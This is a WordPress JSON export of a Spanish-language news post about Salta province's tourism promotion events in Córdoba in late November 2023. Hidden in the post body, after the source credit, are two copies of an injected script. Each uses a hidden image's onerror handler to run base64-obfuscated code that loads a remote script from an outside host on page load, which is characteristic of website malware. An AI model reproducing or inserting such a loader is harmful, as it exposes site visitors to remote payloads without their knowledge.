{"id":3361,"date":"2023-11-28T09:22:47","date_gmt":"2023-11-28T12:22:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3361"},"modified":"2025-08-14T00:04:28","modified_gmt":"2025-08-14T03:04:28","slug":"esta-semana-salta-llevara-su-oferta-turistica-a-cordoba","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3361","title":{"rendered":"Esta semana Salta llevar\u00e1 su oferta tur\u00edstica a C\u00f3rdoba \u00a0"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#73053a\"><em>Hoy 28, 29 y 30 de noviembre se realizar\u00e1n actividades en paseos p\u00fablicos; asimismo, habr\u00e1 acciones destinadas a prensa especializada. El \u00faltimo d\u00eda del mes se llevar\u00e1 a cabo un workshop con agencias locales.<\/em><\/h4>\n\n\n\n<p>En el marco de la estrategia de promoci\u00f3n nacional que lleva adelante la provincia de Salta para promover el turismo y ampliar el n\u00famero de turistas, Salta visitar\u00e1 C\u00f3rdoba esta semana para realizar acciones promocionales en la v\u00eda p\u00fablica; adem\u00e1s, el jueves 30 se llevar\u00e1 a cabo el 2\u00b0 Workshop del que participar\u00e1n agencias locales. &nbsp;<\/p>\n\n\n\n<p>Hoy martes 28 y el mi\u00e9rcoles 29 de noviembre de noviembre en el paseo Buen Pastor se desarrollar\u00e1n activaciones de Street Marketing con acciones para el consumidor final.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10000-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10000-foto-de-archivo.jpg\" alt=\"Foto de Archivo.\"\/><\/a><\/figure>\n\n\n\n<p>Las actividades cerrar\u00e1n el 30 de noviembre con el Workshop Salta en C\u00f3rdoba en el hotel La Ca\u00f1ada donde empresarios salte\u00f1os y cordobeses incrementar\u00e1n los negocios en com\u00fan; las rondas de negocios ser\u00e1n de 10 a 14.30, siendo el acto de apertura a las 12.30.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-cyan-bluish-gray-color\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/mark><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy 28, 29 y 30 de noviembre se realizar\u00e1n actividades en paseos p\u00fablicos; asimismo, habr\u00e1 acciones destinadas a prensa especializada. El \u00faltimo d\u00eda del mes se llevar\u00e1 a cabo un workshop con agencias locales. En el marco de la estrategia de promoci\u00f3n nacional que lleva adelante la provincia de Salta para promover el turismo y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3362,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3361","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3361"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3361"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3361\/revisions"}],"predecessor-version":[{"id":6907,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3361\/revisions\/6907"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3362"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3361"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}